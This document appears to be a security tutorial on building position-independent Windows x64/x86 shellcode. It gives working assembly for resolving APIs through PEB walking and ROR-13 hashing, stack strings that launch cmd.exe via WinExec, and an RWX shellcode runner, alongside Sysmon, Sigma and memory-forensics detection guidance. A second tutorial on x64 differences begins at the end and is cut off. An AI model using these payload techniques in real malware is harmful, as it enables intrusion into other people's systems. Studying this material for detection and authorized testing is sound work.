Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses
Objective: Understand how Windows shellcode achieves position independence — resolving module bases through the TEB/PEB chain, walking PE export tables, hashing API names, and eliminating null bytes — so defenders can detect the resulting memory and behavioral signatures and authorized red teamers can build and test payloads correctly.
1. What Makes Code Position-Dependent?
A normal Windows executable contains absolute virtual addresses everywhere: indirect calls through the Import Address Table (IAT), references to global variables, jump tables, and so on. The PE loader fixes these up at load time using the .reloc section and patches the IAT against the modules it has just mapped.
Shellcode has none of that. It is raw opcodes copied into a memory region (often allocated by VirtualAlloc or written into another process), with no loader, no relocation table, no IAT, and no guarantee about where it will live. Any hardcoded virtual address — to a string, to an API, to a jump target — will be wrong the moment the payload moves.
The constraint is therefore strict: every address the shellcode needs must be computed at runtime, from a known starting point that the OS itself hands the thread. On Windows, that starting point is the Thread Environment Block (TEB).
2. The Problem with the IAT
A standard PE binary calls LoadLibraryA via something like call qword ptr [rip+IAT_LoadLibraryA], an indirect call through a slot the loader populated. Shellcode cannot do this:
- It has no .idata section, no IMAGE_IMPORT_DESCRIPTOR, and no loader to read them.
- It cannot embed an absolute kernel32!LoadLibraryA address because ASLR randomizes module bases every boot.
- It cannot rely on Windows syscall numbers either: those numbers are not a stable ABI and shift between builds.
The standard solution is PEB walking: the shellcode traces the in-memory loader data structures to find kernel32.dll, parses its export table, and resolves the handful of APIs it actually needs (typically LoadLibraryA and GetProcAddress, which then bootstrap anything else).
3. Windows Memory Layout Primer: TEB, PEB, and the Loader
Every Windows thread has a TEB. The OS keeps a pointer to it in a segment register so user-mode code can reach it in a single instruction:
| Architecture | Instruction | Result |
|---|---|---|
| x86 | MOV EAX, FS:[0x30] | EAX ← TEB.ProcessEnvironmentBlock (PEB) |
| x64 | MOV RAX, GS:[0x60] | RAX ← TEB.ProcessEnvironmentBlock (PEB) |
From the PEB, shellcode chains through Ldr (a _PEB_LDR_DATA*) to reach the loader’s three doubly-linked lists of _LDR_DATA_TABLE_ENTRY records — one entry per loaded module.
Relevant offsets (Windows 10/11):
| Struct | Field | x86 offset | x64 offset |
|---|---|---|---|
| _TEB | ProcessEnvironmentBlock | +0x030 | +0x060 |
| _PEB | Ldr | +0x00C | +0x018 |
| _PEB_LDR_DATA | InLoadOrderModuleList | +0x00C | +0x010 |
| _PEB_LDR_DATA | InMemoryOrderModuleList | +0x014 | +0x020 |
| _PEB_LDR_DATA | InInitializationOrderModuleList | +0x01C | +0x030 |
| _LDR_DATA_TABLE_ENTRY | DllBase | +0x018 | +0x030 |
| _LDR_DATA_TABLE_ENTRY | BaseDllName | +0x02C | +0x058 |
Verify offsets on your target build with WinDbg (dt ntdll!_PEB, dt ntdll!_LDR_DATA_TABLE_ENTRY). They are stable across mainstream Windows 10/11 but not guaranteed forever.
// Conceptual layout — fields used by PEB-walking shellcode
typedef struct _LDR_DATA_TABLE_ENTRY {
    LIST_ENTRY InLoadOrderLinks;            // +0x00
    LIST_ENTRY InMemoryOrderLinks;          // +0x10 (x64)
    LIST_ENTRY InInitializationOrderLinks;
    PVOID DllBase;                          // +0x30 (x64)
    PVOID EntryPoint;
    ULONG SizeOfImage;
    UNICODE_STRING FullDllName;
    UNICODE_STRING BaseDllName;             // +0x58 (x64)
    // ...
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
4. Walking the Module List to Find kernel32.dll
The loader populates InMemoryOrderModuleList in a predictable order: the main executable first, then ntdll.dll, then kernel32.dll. (InInitializationOrderModuleList omits the executable, so its order differs.) A common shortcut is to grab the third entry's DllBase without ever comparing a name: fewer bytes and no strings, at the cost of depending on that order.
; x64 — locate kernel32.dll base via the PEB
; Output: RBX = kernel32.dll base address
xor rcx, rcx
mov rax, [gs:rcx + 0x60] ; RAX = PEB
mov rax, [rax + 0x18] ; RAX = PEB->Ldr
mov rax, [rax + 0x20] ; RAX = InMemoryOrderModuleList.Flink (1st: this EXE)
mov rax, [rax] ; 2nd entry: ntdll.dll
mov rax, [rax] ; 3rd entry: kernel32.dll
mov rbx, [rax + 0x20] ; LDR_DATA_TABLE_ENTRY.DllBase
; (offset 0x20 within an InMemoryOrder-rooted entry)
For 32-bit shellcode the same idea applies with smaller offsets:
; x86 — same walk, FS-relative
xor ecx, ecx
mov eax, [fs:ecx + 0x30] ; EAX = PEB
mov eax, [eax + 0x0C] ; PEB->Ldr
mov eax, [eax + 0x14] ; InMemoryOrderModuleList.Flink
mov eax, [eax] ; 2nd
mov eax, [eax] ; 3rd (kernel32)
mov ebx, [eax + 0x10] ; DllBase (x86 offset)
A more robust variant iterates the list and hash-compares BaseDllName.Buffer (Unicode), upper-casing each character inline. That survives reordering and is what production loaders use.
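The 0x20 (x64) and 0x10 (x86) displacements used in the walks above are not the DllBase offsets from the table: the list pointer lands on InMemoryOrderLinks, not on the start of the entry. The following Python sketch models the documented prefix of the structure with ctypes to show where the numbers come from. The helper names make_entry and dllbase_delta are hypothetical, pointers are modelled as fixed-width integers so the result does not depend on the host, and a 64-bit Python build is assumed for the alignment to match.

```python
import ctypes


def make_entry(ptr_type):
    """Model the leading fields of _LDR_DATA_TABLE_ENTRY for a pointer width."""

    class LIST_ENTRY(ctypes.Structure):
        _fields_ = [("Flink", ptr_type), ("Blink", ptr_type)]

    class UNICODE_STRING(ctypes.Structure):
        _fields_ = [
            ("Length", ctypes.c_uint16),
            ("MaximumLength", ctypes.c_uint16),
            ("Buffer", ptr_type),
        ]

    class LDR_DATA_TABLE_ENTRY(ctypes.Structure):
        _fields_ = [
            ("InLoadOrderLinks", LIST_ENTRY),
            ("InMemoryOrderLinks", LIST_ENTRY),
            ("InInitializationOrderLinks", LIST_ENTRY),
            ("DllBase", ptr_type),
            ("EntryPoint", ptr_type),
            ("SizeOfImage", ctypes.c_uint32),
            ("FullDllName", UNICODE_STRING),
            ("BaseDllName", UNICODE_STRING),
        ]

    return LDR_DATA_TABLE_ENTRY


def dllbase_delta(ptr_type):
    """Distance from the InMemoryOrderLinks field to DllBase."""
    entry = make_entry(ptr_type)
    return entry.DllBase.offset - entry.InMemoryOrderLinks.offset


if __name__ == "__main__":
    for label, ptr in (("x64", ctypes.c_uint64), ("x86", ctypes.c_uint32)):
        entry = make_entry(ptr)
        print(label,
              "DllBase at", hex(entry.DllBase.offset),
              "BaseDllName at", hex(entry.BaseDllName.offset),
              "delta from InMemoryOrderLinks", hex(dllbase_delta(ptr)))
```

The same subtraction applies to any field reached through a list pointer, which is why a disassembled PEB walk rarely shows the offsets that WinDbg prints for the start of the entry.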
5. Parsing the PE Export Directory
Once RBX = kernel32!ImageBase, the shellcode parses the PE headers:
ImageBase
└─► IMAGE_DOS_HEADER.e_lfanew (+0x3C)
└─► IMAGE_NT_HEADERS
└─► OptionalHeader.DataDirectory[0] ; EXPORT
└─► IMAGE_EXPORT_DIRECTORY
├─ NumberOfNames
├─ AddressOfNames (RVA → name RVAs)
├─ AddressOfNameOrdinals (RVA → ordinal table)
└─ AddressOfFunctions (RVA → function RVAs)
AddressOfNames and AddressOfNameOrdinals are parallel arrays: index i in AddressOfNames matches index i in AddressOfNameOrdinals, whose 16-bit value o indexes AddressOfFunctions[o]. All values are RVAs, so the resolved function address is ImageBase + RVA.
; x64 — reach the export directory from RBX = ImageBase
; Output: RCX = IMAGE_EXPORT_DIRECTORY*
mov eax, dword [rbx + 0x3C] ; DOS.e_lfanew
lea rdx, [rbx + rax] ; RDX -> IMAGE_NT_HEADERS
mov eax, dword [rdx + 0x88] ; NT.OptionalHeader.DataDirectory[0].VirtualAddress
lea rcx, [rbx + rax] ; RCX -> IMAGE_EXPORT_DIRECTORY
mov r8d, dword [rcx + 0x18] ; NumberOfNames
mov r9d, dword [rcx + 0x20] ; AddressOfNames (RVA)
mov r10d, dword [rcx + 0x24] ; AddressOfNameOrdinals
mov r11d, dword [rcx + 0x1C] ; AddressOfFunctions
The resolver then iterates 0..NumberOfNames-1, hashes the name string at ImageBase + Names[i], compares against a precomputed target, and on match returns ImageBase + Functions[ Ordinals[i] ]. Names and Functions hold 32-bit RVAs; Ordinals holds 16-bit indices.
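For analysts who want to replay the lookup outside a debugger, here is a minimal Python sketch of the same name → ordinal → function chain. It assumes a PE32+ image laid out as mapped in memory (RVA equals buffer offset), compares names directly instead of hashing, and ignores forwarded exports. The function names and the tiny synthetic image built by build_demo_image are hypothetical and exist only to make the sketch self-contained.

```python
import struct


def u16(buf, off):
    return struct.unpack_from("<H", buf, off)[0]


def u32(buf, off):
    return struct.unpack_from("<I", buf, off)[0]


def cstr(buf, off):
    """Read a NUL-terminated ASCII string starting at off."""
    end = buf.index(b"\x00", off)
    return buf[off:end].decode("ascii")


def resolve_export_rva(image, wanted):
    """Return the function RVA for an exported name, or None if absent."""
    nt = u32(image, 0x3C)                      # IMAGE_DOS_HEADER.e_lfanew
    if image[nt:nt + 4] != b"PE\x00\x00":
        raise ValueError("not a PE image")
    opt = nt + 0x18                            # IMAGE_OPTIONAL_HEADER64
    if u16(image, opt) != 0x20B:
        raise ValueError("this sketch handles PE32+ only")
    exp = u32(image, opt + 0x70)               # DataDirectory[0].VirtualAddress
    number_of_names = u32(image, exp + 0x18)
    functions = u32(image, exp + 0x1C)
    names = u32(image, exp + 0x20)
    ordinals = u32(image, exp + 0x24)
    for i in range(number_of_names):
        if cstr(image, u32(image, names + 4 * i)) == wanted:
            ordinal = u16(image, ordinals + 2 * i)   # 16-bit index
            return u32(image, functions + 4 * ordinal)
    return None


def build_demo_image():
    """Hypothetical 0x400-byte image with two exports, for illustration only."""
    img = bytearray(0x400)
    struct.pack_into("<I", img, 0x3C, 0x80)            # e_lfanew
    img[0x80:0x84] = b"PE\x00\x00"
    struct.pack_into("<H", img, 0x80 + 0x18, 0x20B)    # PE32+ magic
    struct.pack_into("<I", img, 0x80 + 0x88, 0x200)    # export directory RVA
    struct.pack_into("<I", img, 0x200 + 0x18, 2)       # NumberOfNames
    struct.pack_into("<I", img, 0x200 + 0x1C, 0x240)   # AddressOfFunctions
    struct.pack_into("<I", img, 0x200 + 0x20, 0x250)   # AddressOfNames
    struct.pack_into("<I", img, 0x200 + 0x24, 0x260)   # AddressOfNameOrdinals
    struct.pack_into("<II", img, 0x240, 0x1000, 0x2000)  # function RVAs
    struct.pack_into("<II", img, 0x250, 0x280, 0x290)    # name RVAs
    struct.pack_into("<HH", img, 0x260, 1, 0)            # Alpha -> 1, Beta -> 0
    img[0x280:0x286] = b"Alpha\x00"
    img[0x290:0x295] = b"Beta\x00"
    return bytes(img)


if __name__ == "__main__":
    image = build_demo_image()
    for name in ("Alpha", "Beta", "Missing"):
        print(name, resolve_export_rva(image, name))
```

The demo deliberately maps the first name to ordinal 1 and the second to ordinal 0, so indexing AddressOfFunctions by the name index instead of the ordinal would return the wrong function.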

6. Function Name Hashing (ROR-13)
Embedding the literal string "LoadLibraryA" would (a) introduce hardcoded data references and (b) be a trivial AV signature. The standard substitute is an inline rolling hash. The most common is ROR-13 add:
// Conceptual ROR-13 hash. Iterate bytes of the export name; stop at NUL.
// Same routine is implemented inline in assembly when resolving APIs.
unsigned int ror13_hash(const char *name) {
unsigned int h = 0;
while (*name) {
h = (h >> 13) | (h << (32 - 13)); // ROR 13
h += (unsigned char)*name++;
}
return h;
}
// Pre-computed constants (illustrative; recompute for your toolchain):
// LoadLibraryA -> 0xEC0E4E8E (0x0726774C, often quoted, is Metasploit's block_api value, which also hashes the module name)
// GetProcAddress -> 0x7C0DFCAA
// ExitProcess -> 0x73E2D87E
// VirtualAlloc -> 0x91AFCA54
Implementing the while body inline as a short test/ror/add sequence inside the export-walk loop produces a few dozen bytes of fully position-independent resolver: no strings, no absolute addresses, no relocations.
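When triaging a sample, the usual task is the reverse one: a 32-bit constant appears next to a rotate-and-add loop and the analyst wants the API name behind it. A minimal Python sketch of the same ROR-13 routine follows, together with a lookup table built from candidate names. The function names and the candidate list are assumptions for illustration; in practice the list would come from the export table of the module being resolved.

```python
def ror32(value, count):
    """Rotate a 32-bit value right by count bits."""
    count %= 32
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def ror13_hash(name):
    """Rotate-then-add hash over the ASCII bytes of name (no terminator)."""
    h = 0
    for byte in name.encode("ascii"):
        h = ror32(h, 13)
        h = (h + byte) & 0xFFFFFFFF
    return h


def build_lookup(names):
    """Map hash -> name so constants found in a sample can be reversed."""
    return {ror13_hash(n): n for n in names}


if __name__ == "__main__":
    # Hypothetical candidate list; real use would enumerate a DLL's exports.
    table = build_lookup(["LoadLibraryA", "GetProcAddress", "VirtualAlloc"])
    for value, name in sorted(table.items()):
        print(f"{value:#010x} {name}")
```

Variants that fold in the module name, upper-case the input, or include the terminating NUL produce different constants, so a miss in the table usually means the sample uses a different variant rather than a different API.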
7. RIP-Relative Addressing and the CALL/POP Trick
When the shellcode does need inline data (a precomputed key, a config blob, a wide-string template), it must reference it without an absolute address.
x64 makes this nearly free: LEA reg, [rel label] is encoded RIP-relative, and direct CALL/JMP use relative displacements just as they do on x86:
lea rcx, [rel api_hash_table] ; RIP-relative, no relocation needed
x86 has no EIP-relative data addressing. The classic substitute is the get-EIP trick: CALL the next instruction, then POP the return address into a register, giving you a known anchor:
call get_eip
get_eip:
pop ebp ; EBP = address of this instruction
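; data referenced as [ebp + (label - get_eip)]
Anything stored inline can now be addressed by displacement from EBP. Note that a CALL to the very next instruction encodes as E8 00 00 00 00, so null-sensitive payloads use the jmp-forward / call-backward variant, whose negative displacement contains no zero bytes.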
8. Stack Strings and Null-Byte Elimination
Shellcode is often delivered via a string-copying primitive (strcpy, lstrcpyA, a parser that stops at \0), so embedded null bytes truncate the payload. Two problems must be solved together: avoid nulls in opcodes, and produce required strings ("kernel32.dll", "WinExec", "cmd.exe") without storing them as data.
Construct strings on the stack by pushing immediates:
; Build "cmd.exe\0" on the stack (8 bytes including NUL)
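xor rax, rax
push rax ; zeroed qword above the string
mov rax, 0x6578652E646D63 ; 'cmd.exe' little-endian; the top byte of the imm64 is 0x00,
                          ; which terminates the string but also puts a NUL in the opcode stream
push rax
mov rcx, rsp ; RCX -> "cmd.exe\0", first argument for WinExec
When the byte stream itself must be null-free, load an encoded constant and decode it in the register (for example with not or xor) before the push.
Eliminate accidental nulls in opcodes: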
| Avoid | Use instead | Reason |
|---|---|---|
| mov rax, 0 (48 C7 C0 00 00 00 00) | xor rax, rax | Removes four NUL bytes |
| push 0 (6A 00) | xor reg, reg; push reg | 6A 00 contains a NUL |
| Short jumps spanning NUL displacements | Pad with nop or reorder code | Avoids NUL in the offset byte |
| mov al, 0x00 | xor al, al | Same fix at byte width |
Always disassemble and grep the assembled output for \x00 before shipping — see Section 10.
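Whether a stack-string immediate carries a zero byte can be checked before anything is assembled. The sketch below, in Python, splits a string into the little-endian qwords that would be pushed and reports which of them contain a NUL. The helper names are hypothetical, and the sketch assumes ASCII input and 8-byte pushes as in the x64 example above.

```python
def stack_string_qwords(text):
    """Return the qword immediates for text, in push order (last chunk first)."""
    raw = text.encode("ascii") + b"\x00"          # string plus terminator
    raw += b"\x00" * (-len(raw) % 8)              # pad to a multiple of 8
    chunks = [raw[i:i + 8] for i in range(0, len(raw), 8)]
    return [int.from_bytes(chunk, "little") for chunk in reversed(chunks)]


def has_null_byte(value, width=8):
    """True if the little-endian encoding of value contains a zero byte."""
    return 0 in value.to_bytes(width, "little")


if __name__ == "__main__":
    for text in ("cmd.exe", "kernel32.dll"):
        for qword in stack_string_qwords(text):
            flag = "contains NUL" if has_null_byte(qword) else "null-free"
            print(f"{text!r}: {qword:#018x} {flag}")
```

For "cmd.exe" the single qword is 0x006578652e646d63, whose top byte is the terminator, so the immediate is not null-free. Only chunks that are completely filled with characters, such as "kernel32", come out clean without further encoding.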
9. x64 ABI Constraints: Shadow Space and Alignment
Windows x64 imposes two rules shellcode authors get wrong constantly:
- RSP must be 16-byte aligned at the point of CALL to any Windows API. The CALL itself pushes an 8-byte return address, so the callee's RSP ends up at (16N - 8) on entry, which is what Microsoft's prolog code expects.
- The caller allocates 32 bytes of shadow space (a.k.a. home space) above the return address, even when the callee takes fewer than four arguments. The callee may spill RCX, RDX, R8, R9 into those slots.
The first four integer arguments go in RCX, RDX, R8, R9; further arguments are pushed right-to-left. Volatile registers (RAX, RCX, RDX, R8–R11) may be clobbered by any CALL; non-volatile (RBX, RBP, RDI, RSI, R12–R15) must be saved if you rely on them.
; Calling WinExec("cmd.exe", SW_HIDE) once API is resolved in RAX
mov rcx, rsp ; pointer to "cmd.exe" (top of stack, built in Section 8); take it before realigning,
             ; because a fixed [rsp + N] offset is no longer reliable after the and
and rsp, -16 ; force 16-byte alignment
sub rsp, 32 ; shadow space (home space)
xor edx, edx ; uCmdShow = SW_HIDE (0)
call rax ; WinExec
add rsp, 32 ; tear down shadow space (does not undo the and)
Misalignment typically manifests as STATUS_ACCESS_VIOLATION on an aligned SSE instruction (movaps / movdqa) inside kernel32 or ntdll, a tell-tale crash signature when reviewing payloads.
10. Extraction and Controlled Testing
Once assembled with NASM, raw bytes are extracted from the COFF object and audited:
nasm -f win64 payload.asm -o payload.obj
objcopy -O binary -j .text payload.obj payload.bin
A quick Python harness checks the extracted blob for embedded nulls and dumps it as a C array. It does not detect relocations, so confirm separately that the object file carries none (for example with objdump -r payload.obj):
# verify.py: sanity-check a raw shellcode blob
data = open("payload.bin", "rb").read()
print(f"[+] size: {len(data)} bytes")
null_offsets = [i for i, b in enumerate(data) if b == 0]
if null_offsets:
    print(f"[!] {len(null_offsets)} NUL byte(s), first at offset {null_offsets[0]:#x}")
else:
    print("[+] null-free")
# C-array dump for embedding in a test loader
print("unsigned char sc[] = {")
print(", ".join(f"0x{b:02x}" for b in data))
print("};")
A minimal local loader executes the payload inside the same process for isolated VM testing. This is the educational sandbox, not a cross-process injector:
// test_runner.cpp — local-only execution for analysis in a VM
// Defenders: this RWX + function-pointer-cast pattern is exactly what
// EDR/ETW THREATINT flags. It is shown so you know what to look for.
#include <windows.h>
#include <string.h>
extern unsigned char sc[];
extern size_t sc_len;
int main(void) {
    void *mem = VirtualAlloc(NULL, sc_len,
                             MEM_COMMIT | MEM_RESERVE,
                             PAGE_EXECUTE_READWRITE);
    if (mem == NULL) {
        return 1; // allocation failed
    }
    memcpy(mem, sc, sc_len);
    ((void(*)())mem)();
    return 0;
}
The VirtualAlloc(PAGE_EXECUTE_READWRITE) → memcpy → indirect-call triad is the canonical shellcode runner pattern and is heavily instrumented.
11. Common Attacker Techniques
| Technique | Description |
|---|---|
| PEB walking | Resolve kernel32/ntdll bases via GS:[0x60] / FS:[0x30] without imports |
| Export hash resolution | ROR-13 (or FNV/djb2) hashing to find APIs without embedded strings |
| Stack strings | Push immediates to materialise "cmd.exe", "WinExec", etc., on the stack |
| Reflective loading | PIC stub maps a full DLL into memory and calls its DllMain (T1620) |
| Remote injection | VirtualAllocEx + WriteProcessMemory + CreateRemoteThread into a target PID |
| APC queuing | QueueUserAPC to deliver shellcode into an alertable thread |
| Process hollowing | Suspend a benign process, unmap its image, write PIC payload, resume |
| Module stomping | Overwrite the .text of a legitimately loaded DLL with PIC shellcode |
12. Defensive Strategies & Detection
PIC shellcode leaves consistent telemetry across Sysmon, ETW, and memory forensics.
Sysmon Event IDs to monitor:
| Event ID | Signal |
|---|---|
| 1 | Process creation (with command line), anomalous parents (winword.exe → cmd.exe) |
| 7 | ImageLoad from user-writable paths into system processes |
| 8 | CreateRemoteThread, the primary remote-injection signal |
| 10 | ProcessAccess with GrantedAccess containing 0x1F0FFF, 0x1410, or PROCESS_VM_WRITE \| PROCESS_VM_OPERATION \| PROCESS_CREATE_THREAD |
| 17/18 | Named pipe creation/connection (common C2 channel) |
| 25 | ProcessTampering (image hollowing) |
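The GrantedAccess values in Event ID 10 are bit masks, and reading them as named rights makes triage much faster. The Python sketch below decodes a mask using the process access-right constants from the Windows SDK headers. The helper names and the rule used in allows_remote_write (both PROCESS_VM_WRITE and PROCESS_VM_OPERATION present) are illustrative assumptions, not a complete injection test.

```python
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0004: "PROCESS_SET_SESSIONID",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x00010000: "DELETE",
    0x00020000: "READ_CONTROL",
    0x00040000: "WRITE_DAC",
    0x00080000: "WRITE_OWNER",
    0x00100000: "SYNCHRONIZE",
}

# Rights needed to allocate in and write to another process's memory.
REMOTE_WRITE_BITS = 0x0008 | 0x0020


def decode_access(mask):
    """Accept an int or a Sysmon-style hex string and list the named rights."""
    if isinstance(mask, str):
        mask = int(mask, 16)
    return [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]


def allows_remote_write(mask):
    """True if the mask carries both VM_OPERATION and VM_WRITE."""
    if isinstance(mask, str):
        mask = int(mask, 16)
    return (mask & REMOTE_WRITE_BITS) == REMOTE_WRITE_BITS


if __name__ == "__main__":
    for sample in ("0x1410", "0x1010", "0x1F0FFF", "0x1FFFFF"):
        print(sample, allows_remote_write(sample), decode_access(sample))
```

Decoded this way, 0x1410 and 0x1010 turn out to be read-oriented masks (query plus PROCESS_VM_READ), which point to memory scraping such as credential dumping rather than to a write-capable injection handle.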
ETW providers give earlier and harder-to-evade signal: Microsoft-Windows-Threat-Intelligence (THREATINT) fires on VirtualAllocEx with PAGE_EXECUTE_READWRITE, WriteProcessMemory, and MapViewOfFile against remote processes. Consuming THREATINT requires a process running as Protected Process Light (PPL), which in turn requires an ELAM-signed driver; this is why EDR vendors, not generic SIEMs, own this telemetry. Also enable the Audit Process Creation policy (Event ID 4688) with command-line inclusion, and Audit Kernel Object to capture OpenProcess handle requests.
Sigma sketch — cross-process handle access for injection:
title: Suspicious Cross-Process Access Likely Preceding Shellcode Injection
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 10
    GrantedAccess|contains:
      - '0x1F0FFF' # PROCESS_ALL_ACCESS as defined before Windows Vista
      - '0x1FFFFF' # PROCESS_ALL_ACCESS on Windows Vista and later
      - '0x1410' # QUERY_LIMITED_INFORMATION|QUERY_INFORMATION|VM_READ (read-only, typical of memory scraping)
      - '0x1F1FFF'
    TargetImage|endswith:
      - '\lsass.exe'
      - '\svchost.exe'
      - '\explorer.exe'
  filter_legit:
    SourceImage|endswith:
      - '\MsMpEng.exe'
      - '\MsSense.exe'
  condition: selection and not filter_legit
level: high
Memory-forensics indicators: Volatility 3 malfind locates RWX regions containing executable code or PE headers in non-image memory; ldrmodules cross-checks mapped modules against the three PEB loader lists and flags any that are missing from them, a common sign of unlinked or reflectively loaded code. Threads whose StartAddress falls inside a heap allocation rather than a mapped image are inherently suspicious.
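The memory-forensics indicators above reduce to a few checks on each region's protection, type, and first bytes. The Python sketch below applies them to region records that are assumed to have been collected already (for example from a VAD listing or VirtualQueryEx output). The Region class and triage function are hypothetical names, this is not how malfind is implemented, and JIT engines will legitimately trip the same checks.

```python
from dataclasses import dataclass

# Page protection and memory type constants from the Windows SDK.
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
MEM_PRIVATE = 0x20000
MEM_IMAGE = 0x1000000

EXECUTABLE = (PAGE_EXECUTE | PAGE_EXECUTE_READ |
              PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY)


@dataclass
class Region:
    base: int        # region base address
    protect: int     # current page protection
    mem_type: int    # MEM_PRIVATE, MEM_MAPPED, or MEM_IMAGE
    head: bytes      # first bytes of the region


def triage(region):
    """Return the list of reasons a region deserves a closer look."""
    reasons = []
    if region.mem_type != MEM_IMAGE and region.protect & EXECUTABLE:
        reasons.append("executable memory not backed by an image")
    if region.protect & PAGE_EXECUTE_READWRITE:
        reasons.append("RWX protection")
    if region.mem_type != MEM_IMAGE and region.head[:2] == b"MZ":
        reasons.append("PE header outside an image mapping")
    return reasons


if __name__ == "__main__":
    samples = [
        Region(0x1F0000, PAGE_EXECUTE_READWRITE, MEM_PRIVATE, b"\xfc\x48\x83\xe4"),
        Region(0x7FF600000000, PAGE_EXECUTE_READ, MEM_IMAGE, b"MZ\x90\x00"),
    ]
    for region in samples:
        print(hex(region.base), triage(region) or "clean")
```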
Hardening:
| Mitigation | Effect |
|---|---|
| ACG (ProcessDynamicCodePolicy) | Forbids new executable pages; breaks VirtualAlloc(PAGE_EXECUTE_READWRITE) |
| DEP / NX | Hardware-enforced non-execute on data pages |
| CFG | Invalidates indirect calls to non-registered targets |
| HVCI | Hypervisor-enforced kernel code integrity |
| ASR rules | Block office/script children, untrusted USB execution, etc. |
| Restrict SeDebugPrivilege | Limits which accounts can open and write to other processes |

13. Tools for PIC Shellcode Analysis
| Tool | Description | Link |
|---|---|---|
| WinDbg | Verify struct offsets (dt ntdll!_PEB, dt ntdll!_LDR_DATA_TABLE_ENTRY) | microsoft.com |
| NASM | Assemble x86/x64 PIC payloads in Intel syntax | nasm.us |
| x64dbg | Dynamic analysis of shellcode in a loader harness | x64dbg.com |
| Ghidra / IDA | Static disassembly of extracted opcodes | ghidra-sre.org |
| Process Hacker | Inspect process memory regions and protections | processhacker.sf.io |
| pe-sieve | Hunts injected, hollowed, or stomped modules | github.com/hasherezade/pe-sieve |
| Volatility 3 | malfind, ldrmodules, vadinfo for memory-resident PIC | volatilityfoundation.org |
| YARA | Signature ROR-13 loops, PEB-walk prologues, hash tables | virustotal.github.io/yara |
| SilkETW | Subscribe to Kernel-Process and other ETW providers (THREATINT itself needs a PPL consumer) | github.com/mandiant/SilkETW |
14. MITRE ATT&CK Mapping
| Technique | MITRE ID | Detection |
|---|---|---|
| Reflective Code Loading | T1620 | Volatility malfind / ldrmodules; THREATINT ETW |
| Process Injection (parent) | T1055 | Sysmon EID 10 + EID 8; ETW THREATINT WriteVM/AllocVM |
| Process Injection: DLL | T1055.001 | Sysmon EID 7 from unusual paths; pe-sieve |
| Process Injection: APC | T1055.004 | Kernel-Process ETW thread events on alertable waits |
| Process Injection: Hollowing | T1055.012 | Sysmon EID 25 ProcessTampering; pe-sieve hollowing scan |
| Obfuscated Files or Information | T1027 | YARA on ROR-13 hash loops and stack-string push sequences |
| Command and Scripting Interpreter | T1059 | EID 4688 / Sysmon EID 1 with command-line auditing |
Summary
- Position-independent shellcode replaces the PE loader’s work at runtime: it must resolve every address it touches, starting from the segment-register pointer to the TEB.
- The PEB → Ldr → InMemoryOrderModuleList chain reaches kernel32.dll in a handful of pointer dereferences without any string comparison.
- Parsing the PE export directory with ROR-13 hashed lookups removes embedded API name strings and the static signatures they create.
- Stack-string construction, XOR-zero idioms, and RIP-relative addressing keep the byte stream null-free and relocation-free.
- Defenders catch the resulting behaviour through Sysmon EID 8/10, THREATINT ETW on VirtualAllocEx/WriteProcessMemory, and Volatility malfind/ldrmodules against unbacked RWX regions, and harden processes with ACG, CFG, HVCI, and ASR rules to break the primitive entirely.
Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions
Objective: Understand the architectural and ABI-level differences between x86 and x64 Windows shellcode, including the Microsoft x64 calling convention, shadow space, stack alignment, position-independent API resolution via PEB walking, and the detection surface each technique exposes.
1. From x86 to x64: What Actually Changed
Moving shellcode from x86 to x64 Windows is not a syntactic exercise of renaming EAX to RAX. The ABI changed, the segment register that anchors the TEB changed, and the addressing model changed. A snippet that “looks right” can execute cleanly, corrupt the host process, and crash three calls later inside an SSE instruction — none of which gives the author an obvious clue.
| Item | x86 | x64 |
|---|---|---|
| General-purpose registers | 8 × 32-bit (EAX…EDI) | 16 × 64-bit (RAX…R15) |
| Windows calling convention | stdcall / cdecl — all args on stack | Unified fast-call — first 4 integer args in registers |
| TEB segment register | FS; PEB at fs:[0x30] | GS; PEB at gs:[0x60] |
| Address width | 32-bit | 64-bit (48-bit canonical VA in practice) |
| call pushes | 4-byte return address | 8-byte return address |
| RIP-relative addressing | Not available | Available; lea rax, [rip + offset] is idiomatic in PIC |
Two consequences dominate the rest of this tutorial. First, x64 adopts a single __fastcall-style ABI with a mandatory shadow space and 16-byte stack alignment rule. Second, the TEB is reached via GS, not FS, and every PEB offset must be updated for the 64-bit struct layout.
2. The Microsoft x64 ABI Deep-Dive
The Microsoft x64 calling convention passes the first four integer arguments in registers and floating-point arguments in the low halves of the first four XMM registers. Anything beyond that goes on the stack, above the shadow space, pushed right-to-left.
| Argument # | Integer Register | Floating-Point Register |
|---|---|---|
| 1st | RCX | XMM0L |
| 2nd | RDX | XMM1L |
| 3rd | R8 | XMM2L |
| 4th | R9 | XMM3L |
| 5th+ | Stack (above shadow space) | Stack |
The return value lives in RAX for integers and pointers, and in XMM0 for floating-point results.
Volatile vs Non-Volatile Registers
| Class | Registers |
|---|---|
| Volatile | RAX, RCX, RDX, R8, R9, R10, R11, XMM0–XMM5 |
| Non-volatile | RBX, RBP, RDI, RSI, RSP, R12, R13, R14, R15, XMM6–XMM15 |
A callee may freely destroy volatile registers; non-volatile registers must be preserved across calls. Shellcode that clobbers RBX or RDI in the host thread and then returns control corrupts the host. This is the single most common reason “working” shellcode crashes the host process several instructions after the shellcode finishes.
Side-by-Side: x86 Push vs x64 Register Load
; --- x86 stdcall: MessageBoxA(0, "msg", "title", 0) ---
push 0 ; uType
push title ; lpCaption
push msg ; lpText
push 0 ; hWnd
call [MessageBoxA] ; callee cleans the stack
